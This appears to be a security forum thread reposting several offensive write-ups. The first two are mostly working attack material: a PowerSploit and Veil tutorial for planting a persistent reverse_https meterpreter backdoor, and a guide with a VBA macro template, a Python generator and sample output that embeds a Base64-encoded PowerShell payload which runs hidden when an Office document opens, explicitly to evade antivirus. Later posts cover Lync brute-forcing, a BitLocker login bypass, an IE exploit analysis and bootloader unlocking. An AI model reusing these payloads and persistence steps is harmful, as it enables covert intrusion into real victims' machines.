Nytro

How-To: Post-Ex Persistence Scripting with PowerSploit & Veil Many penetration testers within the security industry state that getting a system shell is just the starting point for an attack. Sure, I agree, and quite possibly the most significant tenets of our craft could be post exploitation - specifically, the act of maintaining a persistent connection while remaining intimately covert against defense mechanisms. Historically, the act of evading antivirus and/or malware detection has been a perpetual struggle between those that detect and those that evade. We could use code packing, obfuscating and staged multipart net IO based payloads, to name a few. Enter Microsoft, as they tipped the scales in favor of the evaders by introducing the PowerShell scripting language. The PowerShell language was first introduced as version 1.0 with the advent of Microsoft XP SP2/SP3. Additionally, the PowerShell scripting language, although full-featured, is considered a whitelisted application for the purpose of running various local and/or network based functions; therefore, it remains undetected by antivirus software. A number of well-authored PowerShell tutorials exist on the Internet, providing everything necessary to get underway rather quickly. However, although I vehemently support the pedantic study of programming languages, we don’t really need to touch code to establish an effective piece of PowerShell. To further prove the point, this is a quick post to simply document the necessary steps needed to create a persistent PowerShell communication channel using both the PowerSploit and Veil frameworks. This technique will leverage Veil to generate a PowerShell encoded meterpreter payload. Immediately following, the PowerSploit framework will be used to create a PowerShell wrapper that can be executed on the victim machine in order to maintain the persistent connection. Further information regarding the frameworks used within this post can be referenced here: PowerSploit: https://github.com/mattifestation/PowerSploit Veil: https://github.com/veil-evasion/Veil I would also like to thank my colleague, Dan Kottmann, for his assistance and expertise while debugging code/execution gremlins. Lab Environment The lab environment used to stage this exploitation scenario was comprised of the following three systems, all of which were virtualized guests running within an Ubuntu 12.04 (64 arch) host system. Kali Linux (32 Arch) – Attacking System #1 (Primary) Windows 7 (64 Arch) – Attacking System #2 (Supporting) Windows 7 (32 Arch) – Victim System Additionally, the following diagram illustrates the network architecture and the progression of the attack sequence. The procedure takes into consideration that you have already gained an initial meterpreter shell on the victim system and that we are proceeding with post-exploitation from this point on. First Step – Create meterpreter payload using Veil. Second Step – Place Veil payload into PowerSploit and generate new payload. Third Step – Use the existing meterpreter session to upload the new PowerShell script. Fourth Step – Relax and enjoy the persistent connection. Installing Veil The easiest method to install the Veil framework is to simply perform a “git clone” fromChris Truncer’s GitHub code repository within a Kali Linux operating system. There are specific installation details on his GitHub site, but essentially he provides a “setup.py” script that will install the necessary dependencies. A successfully installed instance of the Veil framework should return something similar to the following screenshot upon typingpython /usr/share/veil/Veil.py. Installing PowerSploit The next step is to download the PowerSploit archive from the GitHub code repository and install it within the Microsoft Windows 7 (64 Arch) attacking system. The following series of commands will provide adequate details for installing the framework. Note that we will need administrative privileges for the following steps. Get the value of the “PSModulePath” environmental variable. C:\Users\labrat>set ---- PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ Decompress the downloaded PowerSploit archive and place it in the previously identified PowerShell Modules directory. C:\Windows\System32\WindowsPowerShell\v1.0\Modules>move C:\Users\labrat\Downloads\PowerSploit-master . 1 dir(s) moved. C:\Windows\System32\WindowsPowerShell\v1.0\Modules>dir Volume in drive C has no label. Volume Serial Number is 0CA4-867A Directory of C:\Windows\System32\WindowsPowerShell\v1.0\Modules 12/04/2013 11:24 AM <DIR> . 12/04/2013 11:24 AM <DIR> .. 12/04/2013 11:18 AM <DIR> PowerSploit-master 07/14/2009 12:32 AM <DIR> PSDiagnostics 07/14/2009 12:37 AM <DIR> TroubleshootingPack 0 File(s) 0 bytes 5 Dir(s) 12,084,989,952 bytes free Enter into the PowerShell scripting environment and set the execution policy to “Unrestricted” so that we can execute our PowerSploit scripts. C:\Users\labrat>powershell Windows PowerShell Copyright (C) 2009 Microsoft Corporation. All rights reserved. PS C:\Users\labrat> PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules> Set-ExecutionPolicy Unrestricted Finally, import the PowerSploit “Persistence” module and answer “Run” if prompted with a warning. PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master> Import-Module .\Persistence Security Warning Run only scripts that you trust. While scripts from the Internet can be useful, this script can potentially harm your computer. Do you want to run C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence\Persistence.psm1? [D] Do not run [R] Run once Suspend [?] Help (default is "D"): R ---- Generating the Veil Payload The following series of screenshots will provide the details to generate a .bat scriptcontaining an embedded Base64 encoded PowerShell meterpreter payload. Thewindows/meterpreter/reverse_https payload was used during this scenario considering it offers an inherent level of persistence in and of itself while also increasing the probability that an HTTP based payload will be allowed outbound. Also note that thepowershell/VirtualAlloc method is used as it allows for inline shellcode injection. Finally, we are presented with the .bat file containing the Base64 encoded payloads applicable to both 32 and 64 arch types. We need to copy out the entire Base64 value to be used later within PowerSploit. Note that we obviously don’t care which of the Base64 values we copy, since both of the payloads are identical. The wrapper shell script is simply providing the conditional required to identify arch types. Generating the PowerSploit Payload This section is based on Matt Graeber’s PowerSploit article and is well worth the read. The motivation for providing this blog post was to illustrate how to leverage the inclusion of Veil payloads in conjunction with Matt’s technique. Getting back on task, on the Windows 7 (64 Arch) system, we need to ensure that we are still in the PowerShell scripting environment. Again we can enter the environment by typing the following within a privileged command shell and change directory to the location of the PowerShell modules. C:\Users\labrat>powershell Windows PowerShell Copyright (C) 2009 Microsoft Corporation. All rights reserved. PS C:\Users\labrat> PS C:\Users\labrat> cd C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master> Now we can create an arbitrary variable and assign the necessary value to it. The following example provides a stub for a variable assignment that can be used by simply plugging in our previously copied Base64 Veil payload. $p = {iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("VEIL_PAYLOAD_HERE")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()} The following uses our Veil payload, and represents an actual assignment. We can now set a couple of additional arbitrary variable values that will define both non-privileged and privileged persistence methods, respectively. The first definition will run the persistence script upon each successful logon. The second, considering we have gain privileged access to the victim system, will run the persistence script each day at 10:00 AM. $u = New-UserPersistenceOptions -Registry –AtLogon $e = New-ElevatedPersistenceOptions -ScheduledTask -Daily -At '10:00 AM' Finally, we need to generate the persistence script using the PowerSploit “Add-Persistence” module. PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence> Add-Persistence -ScriptBlock $p -UserPersistenceOptions $u -ElevatedPersistenceOptions $e -Verbose -PassThru This should generate two files outputted to the same directory. The Persistence.ps1 andRemovePersistence.ps1 files should be self-explanatory but are simply used to enable persistence and remove persistence. PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence> ls Directory: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master\Persistence Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 12/4/2013 11:19 AM 16025 Add-Persistence.ps1 -a--- 12/4/2013 11:19 AM 5140 New-ElevatedPersistenceOptions.ps1 -a--- 12/4/2013 11:19 AM 3555 New-UserPersistenceOptions.ps1 -a--- 12/4/2013 5:29 PM 7128 Persistence.ps1 -a--- 12/4/2013 11:19 AM 1104 Persistence.psd1 -a--- 12/4/2013 11:19 AM 170 Persistence.psm1 -a--- 12/4/2013 5:29 PM 514 RemovePersistence.ps1 -a--- 12/4/2013 11:19 AM 583 Usage.md Profit After all of this, we are set to actually profit from all of our effort. At this point, the victim system is in a state of initial exploitation as the following screenshot illustrates. We now need to upload our newly generated PowerShell script so that we can maintain persistence. Similar to what we did on the Windows 7 (64 Arch) system, we need to ensure that the victim machine can run PowerShell scripts by explicitly defining the Set-ExecutionPolicy Unrestricted policy. However, if we drop into command shell from within meterpreter, then the only available shell is non-interactive. Fortunately, Microsoft has afforded us the ability to set the policy using a non-interactive method from within the command line. A word of mention, we are using a separate multi-handler during these examples as opposed to the inherent handler invoked for a specific exploit payload. The following configuration was used within a MetaSploit resource script and started from the msfconsole as follows. Save this to a file called reversehttps.rc use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST 0.0.0.0 set LPORT 8443 set ExitOnSession false exploit -j –z Invoke the script using: Msfconsole –r reversehttps.rc Returning to the example, we can now move our new Persistence.ps1 script from the Windows 7 (64 Arch) system over to the Kali Linux system. Then we will use the post-exexec_powershell module to upload our Persistence.ps1 script via the existing meterpreter session as the following screenshot illustrates. The successful execution of the Persistence.ps1 should execute cleanly without returning any syntax errors. Note that the following screenshot had returned multiple meterpreter sessions since the Windows 7 (32 Arch) victim system was rebooted and logged back into.Furthermore, there were multiple instances of the persistence script staged on the victim resulting in the persistent connections. If everything worked correctly, persistence should be working as expected. You can obviously test this in a controlled environment by re-authenticating the victim user, which should invoke a new meterpreter session. The process of removing persistence is as simple as copying the RemovePersistence.ps1script from the Windows 7 (64 Arch) system to the Kali Linux system and running the script using the MetaSploit exec_powershell module. CONTACT INFO Name: Chris Patten Sursa: https://www.fishnetsecurity.com/6labs/blog/how-post-ex-persistence-scripting-powersploit-veil

Embedding Veil Powershell payloads into Office Documents So upon reading Backdoooring Office Documents , I wondered if I could achieve something with one of the Veil-framework Powershell payloads. The end goal being if we had a user on an assessment open and run our macro (which happens more than I would like to admit), we could have a memory resident backdoor that would not get flagged by AV. 1. Veil Payload To start, we would ned to create a Veil (Veil install/documentation) Powershell payload. Upon opening Veil, we’ll just enter: use powershell/VirtualAlloc generate This will start the process for generating our specific Powershell payload. Veil allows for not only msfvenom payloads, but also custom shellcode. Here, we are going to simply use meterpreter/reverse_http. Oh and, in case you were wondering, Veil supports tab completion on the msfvenom payloads! Once the shellcode is generated, we then name our output and take note of its location. Oh and move it to our Office machine 2. Office Macros Now onto embedding the payload into an office document. Open Office, and head to the developer tab, and open the Visual Basic editor: From here, open the payload.bat from Veil in a text editor, and copy the first section (x86) from the word powershell until the end of the first if statement: We will need to create a new Subfunction, “Workbook_Open()”, create two new String objects, “exec” and “str”, and paste this as the string value for “exec” in the VBA pane. Sub Workbook_open() Dim exec As String Dim str As String str = "" exec = "[entire string]" Of course it complains, but this is okay since we will fix this by using string concatenation. Head to the string just after “FromBase64_decrypt” and cut the entire section in between the quotation marks. Insert this string as the “str” value. str="[Value]" The string is still too long! Ok, let’s split it in half and concatenate the string back together one line later: str = "[Value A]" str = str + "[Value B]" Now, we can call the variable “str” in between the the quotation marks: Next, we need to properly escape all the quotations on the line by changing \” to \””. There are occurrences before “Invoke-Express”, and before and after the variable “str”. Finally, we place the entire thing into a Shell(). Our VBA editing is complete. We could continue breaking up the strings and concatenating them back numerous times if need be to make things easy to read or fit into a blog! Below is a copy/paste friendly (read cleaner) template. Also considering how tedious this can be by hand, I wrote a python script, also below, that automates moving this into a vba-friendly output. Template: Sub Workbook_Open() Dim exec As String Dim str As String str = "[half payload value]" str = str + "[half payload value]" exec = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command" exec = exec + " ""Invoke-Expression $(New-Object IO.StreamReader " exec = exec + "($(New-Object IO.Compression.DeflateStream " exec = exec + "($(New-Object IO.MemoryStream (,$([Convert]" exec = exec + "::FromBase64String(\"" " & payload & " \""))))," exec = exec + "[IO.Compression.CompressionMode]::Decompress))," exec = exec + "[Text.Encoding]::ASCII)).ReadToEnd();"" " Shell(exec) Macro_safe.py: (google drive download here) (new github link here, part of the MacroShop repository) #!/usr/bin/python ##### # macro_safe.py ##### # # Takes Veil powershell batch file and outputs into a text document # macro safe text for straight copy/paste. # import os, sys import re def formStr(varstr, instr): holder = [] str1 = '' str2 = '' str1 = varstr + ' = "' + instr[:54] + '"' for i in xrange(54, len(instr), 48): holder.append(varstr + ' = '+ varstr +' + "'+instr[i:i+48]) str2 = '"\r\n'.join(holder) str2 = str2 + "\"" str1 = str1 + "\r\n"+str2 return str1 if len(sys.argv) < 2: print "----------------------\n" print " Macro Safe\n" print "----------------------\n" print "\n" print "Takes Veil batch output and turns into macro safe text\n" print "\n" print "USAGE: " + sys.argv[0] + " <input batch> <output text>\n" print "\n" else: fname = sys.argv[1] f = open(fname) lines = f.readlines() f.close() cut = [] for line in lines: #split on else to truncate the back half first = line.split('else') # split on \" cut = first[0].split('\\"', 4) #get rid of everything before powershell cut[0] = cut[0].split('%==x86')[1] cut[0] = cut[0][2:] #get rid of trailing parenthesis cut[2] = cut[2].strip(" ") cut[2] = cut[2][:-1] # for i in range(0,3): # print str(i) + " " +cut top = "Sub Workbook_Open()\r\n" top = top + "Dim str As String\r\n" top = top + "Dim exec As String\r\n" #insert '\r\n' and 'str = str +' every 48 chars after the first 54. payL = formStr("str", str(cut[1])) #double up double quotes, add the rest of the exec string idx = cut[0].index('"') cut[0] = cut[0][:idx] + '"' + cut[0][idx:] cut[0] = cut[0] + "\\\"\" \" & str & \" \\\"\" " + cut[2] +"\"" #insert 'exec = exec +' and '\r\n' every 48 after the first 54. execStr = formStr("exec", str(cut[0])) shell = "Shell(exec)" bottom = "End Sub\r\n\r\n\'---Generated by macro_safe.py by khr040sh---" final = '' final = top + "\r\n" + payL + "\r\n\r\n" + execStr + "\r\n\r\n" + shell + "\r\n\r\n" + bottom + "\r\n" print final try: f = open(sys.argv[2],'w') f.write(final) # python will convert \n to os.linesep f.close() except: print "Error writing file.\n Please check permissions and try again.\nExiting..." sys.exit(1) print "File written to " + sys.argv[2] + " !" Sample output from python code: Sub Workbook_Open() Dim str As String Dim exec As String str = "nVZNj+M2DL3nVwiBDwkmnsrf9gQD7LSLBRYoigIzaA9BsJBleWKsYw" str = str + "e2vJuZtv+94kvo6XYvRS+0RVHk4yNNy9PiXrxbLnbv2/bj8d" str = str + "QPdrX8bIbOtFF4W7Xtcr0Xp6lsGy1Gq6x7mLN1++JjZ3+1g/" str = str + "itGeyk2oe27fXqqvu6EVPTWXG+Pl+uz9f19n/H+Wkwypqng3" str = str + "tUHGe6+v2yEW+Rr2//iH3V/Dv6cfyiB/tfYh/NcTR29b3nOa" str = str + "vlu4XXOyIfqsp/ejkZ4bszpRnem7rpGtv0nfC08H9RRyOWvz" str = str + "ddFC6F37nVeFLaCGg+TJ0my1H4JzWO9jBMC+987/V3d9+QLD" str = str + "fyHEhJj+jyiOV6K3Y/vliz2++9kSrai4dBH8RoWqOtqTbXt6" str = str + "Z7xsadOOepqIf+KOzBiJN6aXtVLT70U1eJMBS6P54cEWVrhO" str = str + "l0X5lhXDxYa44nuLD9Vc0nxdfGHkQgGkebuiTR1xTjh/HQfF" str = str + "ZWfXpWnzrVLL5XiXHS2pjKXJ2MzasRUZKK1ezsXq4XUzc2z5" str = str + "0z0gc1iHKqd3uXpku+Kp3QtROlcqJOnUhCIod0YU4mhRNZTE" str = str + "sSNYnE0JI2NIkyIF3kRE5CkxdJdhE2aBnQUka8NBSjJPo1xa" str = str + "3iWUcmUULuSdQhgyw1GeNExHGxkVOMjERFqBRh1uQvI5MCXi" str = str + "oS5EAqPgb0cF+WjEqSSUTGEb0lGTmgkAW5r8l9TcdS2jUgJ2" str = str + "SGYjoWErSQjgWAVjBXmnQx7EJmIyNoGe0a2k3JXwy4CaPKkD" str = str + "R5NgRcGtYhGVAiEw6J9FE3kIN6IIUk57MJqkpvFe0aVLXkCo" str = str + "J2COzmciZRMYKw4mZAtcI5yzRjmuKMjQMSiuyKiHdRQcCVKT" str = str + "dIHjLPcAoTeInJJEXN0XCaa3RJYe4XjbhABQ5yzi1XDC1T3D" str = str + "lydlWRXQqkFCinZV4z3DjnVFPSRWgQIAUq2ohrrip6A1UFf8" str = str + "gNOpCow9kzBk/BxAJpKLnIipCW9Uwi+SsKjoZlEjPjlyLDC8" str = str + "ENcBb+Yj5R5Ex7nnBcSYGCgikxtCznBkZzBWgGxcdQhRhfcs" str = str + "j8oc2Q4BsRqPnFhIzxdYNYUJKQMCAWb7RRGm4pREOfXqYKTA" str = str + "CS7IqQT+DDBr6czsp8Ro8CaE4LcdFmmC8JnSjQNIQU0wKAYn" str = str + "z7ilFV5CDFeFBMLGbEBXjM6SsIpEXGKp53aRmTFwwekIMeyu" str = str + "a5VmGWKE4fmZuEdZiEeMsrfkOX1CXXCGy86VDQlHRoZfRuRf" str = str + "4whpFvnnLN8WEDCwZUmXDJCoqrS+bqApyWmPcKHZFxtQpMH8" str = str + "y6gOuGZEAnug7DqMYwwgCtGFER4zkMuciYjphNaDOFWQcEGS" str = str + "Mo35gkHeZGmnD18fMKIkYA6pARSnspPNmZfLuo+0GsvOZebr" str = str + "1G+O4fvXI//dufTfdsD36wdtqbm7X4g24O16vL7nJ32a+88+" str = str + "1T7xZRuFrfeM16I9zRndfsNyJYiz9FP1m/m9p2+9fCe8Xd56" str = str + "uLlyNi45039KA7x6NVg/UfW2NOwn80une3B7qaSPk3" exec = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm" exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRe" exec = exec + "ader ($(New-Object IO.Compression.DeflateStream " exec = exec + "($(New-Object IO.MemoryStream (,$([Convert]::Fro" exec = exec + "mBase64String(\"" " & str & " \"" )))), [IO.Comp" exec = exec + "ression.CompressionMode]::Decompress)), [Text.En" exec = exec + "coding]::ASCII)).ReadToEnd();""" Shell(exec) End Sub '---Generated by macro_safe.py by khr040sh--- [EDITED: UPDATED python link] Sursa: https://khr0x40sh.wordpress.com/2014/06/02/embedding-veil-powershell-payloads-into-office-documents/

Serialization Security Bugs Explained If you’re in information security you’ve probably heard a lot about serialization bugs. They are becoming increasingly common, and I wanted to give a basic overview of how they work and why they’re an issue. The parsing problem So much of security comes down to parsing. It’s the primary reason we need input validation, and the reason that software like antivirus and network protocol analyzers can have so many security issues. The job of a parser is to take input from somewhere else and run it through your own software. That should frighten you. It’s like a CDC employee using the ‘open and lick’ method to test petri dish samples. Bottom If you’re going to parse something, you have to get intimate with it. And that brings us to serialization. Serialization Serialization is the process of capturing a data structure or an object’s state into a (serial) format that can be efficiently stored or transmitted for later consumption. So you can take an object, capture its state, and then put it in memory, write it to disk, or send it over the network. Then at some point the object can be retrieved and consumed, restoring the object’s state. Example A basic example of serialization might be to take the following array: $array = array("a" => 1, "b" => 2, "c" => array("a" => 1, "b" => 2)); And to serialize it into this: a:3:{s:1:"a";i:1;s:1:"b";i:2;s:1:"c";a:2:{s:1:"a";i:1;s:1:"b";i:2;}} At its core, serialization is a type of encoding. The crux So this brings us to the core issue: deserialization requires parsing. In order to go from that serialized format to usable data, some software package needs to unpack that content, figure it out, and then consume it. And this is precisely what parsers are so bad at. And doing it poorly can lead to all manner of flaws, up to and including arbitrary code execution. Summary Parsing untrusted input is hard Serialization takes data and encodes it into opaque formats for transfer and storage To make use of that content, parsers must unpack and consume it It’s extremely hard to do this correctly, and if you do it wrong it could mean code execution This applies to most any language that uses serialization, but some languages (like Java) are in worse shape than others. Notes The Wikipedia article has a good set of language implementations Here’s a writeup on a Java serialization bug. Link: https://danielmiessler.com/study/serialization-security-bugs-explained/

THE MOST FORGOTTEN WEB VULNERABILITIES Written by 0KaL @ WhiteCollarGroup Reviewed by WCG147, 3du and NeoInvasor Introduction PHP is adorable. It’s learning curve is short, yet its features allow you to create virtually any kind of web application. But PHP, as some use to say, allows the programmer to do a lot of weird things. While I really think it’s a good aspect for a programming language, for beginners it might bring a lot of headaches and angry clients. The vulnerabilities that we are going to see here really do deserve some attention from us (as any other vulnerability). They’re not vulnerabilities that will provide, to some attacker, permissions to hack the entire server (maybe this is the reason why it’s so forgotten), but this does not mean that they can’t create a path, sometimes with some basic social engineering1 , for the attacker to reach this target. Download: https://www.exploit-db.com/docs/39434.pdf

Brute-forcing Microsoft Lync via NTLM FEBRUARY 10, 2016 BY BEN LEAVE A COMMENT Ok, so there is good reason why Lync should not be accessible over the Internet similarly to any single factor system. BRUTE-FORCE will usually prevail!!!! I installed burp’s certificate on my Windows host and attempted to login from Lync (From this I was an HTTP NTLM Login request to https://lyncwebact.customer.com/WebTicket/WebTicketService.svc). NTLM like many other services is made fairly simple to brute-force or attempt one password guess against many accounts. I have used hydra for this once before but a colleague recently wrote a pretty decent python script that makes it even easier and you don’t need to know all the switches etc (https://github.com/strawp/random-scripts/blob/master/ntlm-botherer.py). Anyway, to make obtaining the NTLM url simple I wrote a quick python script that located the company DNS records for lyncdiscover and then finds the NTLM url as shown below: https://github.com/benpturner/h00k/blob/master/python/lyncdiscover.py Sursa: http://www.hackwhackandsmack.com/?p=524

From zero to SYSTEM on full disk encrypted Windows system (Part 1) 10 FEBRUARY 2016 on Authentication Bypass, MS16-014, CVE-2016-0049, BitLocker, Full Disk Encryption, Windows Intro Whether you want to protect the operating system components or your personal files, a Full Disk Encryption (FDE) solution allows you to keep track of the confidentiality and integrity. One of the most commonly used FDE solutions is Microsoft Bitlocker®, which due to its integration with the Trusted Platform Module (TPM) as well as the Active Directory environment makes it both user-friendly and manageable in a corporate environment. When the system is protected with a FDE solution, without a pre-boot password, the login or lock screen makes sure attackers with physical access are not able to gain access to the system. In this post we will explain how an attacker with physical access to an active directory integrated system (e.g. through stealing) is able to bypass the login or lock screen, obtain a clear-text version of the user’s password and elevate his privileges to that of a local administrator or SYSTEM. This can be accomplished via two security vulnerabilities which affects all Windows versions (from Vista to 10) and abusing a standard “security” feature. These two vulnerabilities, discovered with the help of my colleague Tom Giliswere reported to Microsoft however only one vulnerability is patched at the time of writing (CVE-2016-0049 / MS16-014). The other one, which allows you to elevate your privileges to that of a local administrator or SYSTEM is still under investigation by Microsoft and is not yet disclosed here. Acknowledgement by Microsoft: https://technet.microsoft.com/en-us/library/security/mt674627.aspx Step 1 – Hibernation – Your friendly neighbourhood password dumper Speaking for myself, and probably a lot of other users, shutting down a laptop has become a thing of the past. In order to be able to rapidly start using your system when travelling from one place to another, we put it into sleep (or hibernation) mode, essentially putting all processes on hold to be easily resumed when needed. Although in order to resume your session after sleep or hibernation, you’ll have to enter your password on the lock screen (or at least I hope so), the system has your password stored somewhere in memory in order to resume the different processes. We want the system to dump the contents of the memory on disk so we can recover it later. Hibernation is there to the rescue, but we need to be able to force the system into hibernation, creating theHIBERFIL.SYS. Luckily, the default configuration of a laptop running Windows depicts going into hibernation if the battery hits a critical low. This feature, by default at set 5%, ensures you don’t lose any unsaved documents when your battery dies. So the first step, in case the laptop is running but put in sleep (or hibernation), is letting the battery die by playing the waiting game... Once we force the laptop into hibernation mode we reboot it and move to the next step. Step 2 – Bypassing the login or lock screen Before we move on, we would like to give credit to Ian Haken, who discovered the original vulnerability affecting Windows Authentication. He presented his findings at BlackHat Europe 2015 which inspired us to investigate further. In order for the original attack to work, the following prerequisites should be met: The target machine is member of a Windows domain The domain user (the target) has previously logged into the machine and his password is cached locally (Optional however pointless without) Full Disk Encryption without any pre-boot authentication (e.g. BitLocker With TPM integration) If these conditions were met, an attacker needed to create a rogue Kerberos server with the targets user account’s password set to a value of choice and indicated as expired. Upon login attempt, Windows would then prompt the user to change the password before continuing. Once the password change procedure is completed, the cached credentials on the machine are updated with the new password set by the attacker. Because the system is not able to establish a secure connection, the password is not updated on the Kerberos server but still allows the attacker to login when the system no longer has an active network connection (using the cached credentials) A pretty straight forward attack but the vulnerability has been out there for years overlooked by many people. Now that the original vulnerability is clear, we want to explain how we managed to bypass this. (More information about the original vulnerability can be found in Ian’s whitepaper here.) The original patch which was rolled out by Microsoft (KB3105256 - Microsoft Security Bulletin MS15-122) actually changes the flow of the password change feature. It first checks if there is a trust between the domain controller and the target machine before changing the password on the target machine. We had to find a way to make the workstation believe the Kerberos server, in our case a rogue Windows domain controller with the same FQDN is a genuine one. In a normal situation, when a computer joins a domain a computer object is created in the active directory which holds various attributes from this system. One of those is the Service-Principal-Name (SPN) attribute which is used for mutual authentication with an instance of a service on the workstation. This SPN is the name by which a client uniquely identifies an instance of a service. Knowing that this information is used to establish mutual authentication we created a computer object with the name of our target machine (which can be easily found). We then moved on to change the servicePrincipalNameattribute by adding the following values: HOST/computername HOST/computername.domain Now follow the same procedure as before (change the user’s password and mark it as expired) and you will be able to change the change the cached password. Disconnect the system from the network and use the newly set password to bypass the login screen and gain full access to the system as the original user. Although the authentication has been bypassed, we still only have the (limited) privileges of the victim’s account (taking into consideration this is not an local administrator). This is where the next step comes in, in which we explain how you can obtain full local administrative privileges just by using standard Windows functionalities and thus not relying on any vulnerable installed software. Step 3 – Privilege escalation to SYSTEM At the time of writing, the vulnerability has not yet been patched by Microsoft and thus cannot be disclosed. Once more information can be safely shared, this post will be updated. Sursa: https://blog.ahmednabeel.com/from-zero-to-system-on-full-disk-encrypted-windows-system/

It’s been a while since a pure JavaScript vulnerability was widely used by exploit kits. The last few years mostly gave us IE Use-After-Free vulnerabilities. When those were dealt with by Microsoft’s IsolatedHeap and MemoryProtection mechanisms, introduced in the middle of 2014, the stage was clear for Flash to take over. Now, as Flash is marching towards its imminent death, Silverlight has been dying for a long time, and Java applets must be signed and played only after the user is prompted, we can expect some new trend to arrive on the scene. CVE-2015-2419 (Jscript9 Memory Corruption), the subject of our paper, was patched 5 months ago, but is still used across most Exploit Kits. However, no satisfying analysis, regarding either its root cause or how to successfully exploit it, has been published. We think an analysis of this kind is needed: First, to see a pure JS exploit for IE 11, despite the heap corruption mitigations in IE mentioned above. Second, unless Microsoft comes up with similar protections for IE’s JS engine, this might be the kickoff for similar exploits as soon as Flash disappears. We started with a working exploit taken from Rig EK (MD5: 4497f09502758ae82f122b21b17d3644. It looks exactly the same as in Angler EK). It’s heavily obfuscated and tricky, which makes the job of understanding the vulnerability, and the exploit directly from the exploit code, very complicated. Let’s dig in to the process of analyzing this exploit. Link: http://blog.checkpoint.com/2016/02/10/too-much-freedom-is-dangerous-understanding-ie-11-cve-2015-2419-exploitation/

Unlocking the Motorola Bootloader In this blog post, we'll explore the Motorola bootloader on recent Qualcomm Snapdragon devices. Our goal will be to unlock the bootloader of a Moto X (2nd Gen), by using the TrustZone kernel code execution vulnerability from the previous blog posts. Note that although we will show the complete unlocking process for this specific device, it should be general enough to work at-least for most modern Motorola devices. WHY MOTOROLA? After reporting the previous TrustZone kernel privilege escalation to Qualcomm, I was gifted a shiny new Moto X. However... There was one little snag - they accidentally sent me a locked device. This was a completely honest mistake, and they did offer many times to unlock the device - but where's the fun in that? So without further ado, let's dive into the Motorola bootloader and see what it takes to unlock it. SETTING THE STAGE Before we start our research, let's begin with a short introduction to the boot process - starting right at the point at which a device is powered on. First - the PBL (Primary Boot Loader), also known as the "BootROM" is executed. Since the PBL is stored within an internal mask ROM, it cannot be modified or provisioned, and is therefore an intrinsic part of the device. As such, it only serves the very minimal purpose of allowing the device to boot, and authenticating and loading the next part of the boot-chain. Then, two secondary bootloaders are loaded, SBL1 (Secondary Boot Loader), followed by SBL2. Their main responsibility is to boot up the various processors on the SoC and configure them so that they're ready to operate. Next up in the boot-chain, the third and last secondary bootloader, SBL3, is loaded. This bootloader, among other tasks, verifies and loads the Android Bootloader - "aboot". Now this is where we get to the part relevant for our unlocking endeavours; the Android Bootloader is the piece of software whose responsibility is, as its name suggests, to load the Android operating system and trigger its execution. This is also the piece of boot-chain that OEMs tend to customize the most, mainly because while the first part of the boot-chain is written by Qualcomm and deals with SoC specifics, the Android bootloader can be used to configure the way the Android OS is loaded. Among the features controlled by aboot is the "bootloader lock" - in other words, aboot is the first piece of the boot-chain which can opt to break the chain of trust (in which each bootloader stage verifies the next) and load an unsigned operating system. For devices with an unlockable bootloader, the unlocking process is usually performed by rebooting the device into a special ("bootloader") mode, and issuing the relevant fastboot command. However, as we will later see, this interface is also handled by aboot. This means that not only doesaboot query the lock status during the regular boot process, but it also houses the code responsible for the actual unlocking process. As you may know, different OEMs take different stances on this issue. In short, "Nexus" devices always ship with an "unlockable" bootloader. In contrast, Samsung doesn't allow bootloader unlocking for most of its devices. Other OEMs, Motorola included, ship their devices locked, but certain devices deemed "eligible" can be unlocked using a "magic" (signed) token supplied by the OEM (although this also voids the warranty for most devices). So... it's all very complex, but also irrelevant. That's because we're going to do the whole process manually - if aboot can control the lock status of the device, this means we should probably be able to do so as well, given an elevated enough set of privileges. GETTING STARTED Now that we have a general grasp of the components involved and of our goal, the next stage is to analyse the actual aboot code. Since the binaries for all stages of the boot-chain are contained within the factory firmware image, that would naturally be a good place to start. There are several download links available - here are a few. In case you would like to follow along with me, I'm going to refer to the symbols in the version "ATT_XT1097_4.4.4_KXE21.187-38". After downloading the firmware image, we are faced with our first challenge - the images are all packed using a proprietary format, in a file called "motoboot.img". However, opening the file up in a hex-editor reveals it has a pretty simple format we can deduce: As you can see above, the sought-after aboot image is stored within this file, along with the TrustZone image, and various stages of the boot-chain. Good. After analysing the structure above, I've written a python script which can be used to unpack all the images from a given Motorola bootloader image,you can find it here. MUCH ADO ABOOT NOTHING We'll start by inspecting the aboot image. Discouragingly, it is 1MB large, so going over it all would be a waste of time. However, as we've mentioned above, when booting the device into the special "bootloader" mode, the actual interaction with the user is provided by aboot itself. This means that we can start by searching for the strings which are displayed when the unlocking process is performed - and continue from there. A short search for the "unlock..." string which is printed after starting the unlock process brings us straight to the function (@0xFF4B874) which deals with the unlocking logic: That was pretty fast! As you can see, after printing the string to the console, three functions are called consecutively, and if all three of them succeed, the device is considered unlocked. Going over the last two functions reveals their purpose is to erase the user's data partitions (which is always performed after the bootloader is unlocked, in order to protect the device owner's privacy). In any case, this means they are irrelevant to the unlocking process itself and are simply side-effects. This leaves us with a single function which, when called, should unlock the bootloader. So does this mean we're done already? Can we just call this function and unlock the device? Actually, not yet. Although the TrustZone exploit allows us to achieve code-execution within the TrustZone kernel, this is only done after the operating system is loaded, at which point, executing aboot code directly could cause all sorts of side-effects (since, for example, the code might assume that there is no operating system/the MMU could be disabled, etc.). And even if it were that simple, perhaps there is something interesting to be learned by fully understanding the locking mechanism itself. Regardless, if we can understand the logic behind the code, we can simply emulate it ourselves, and perform the 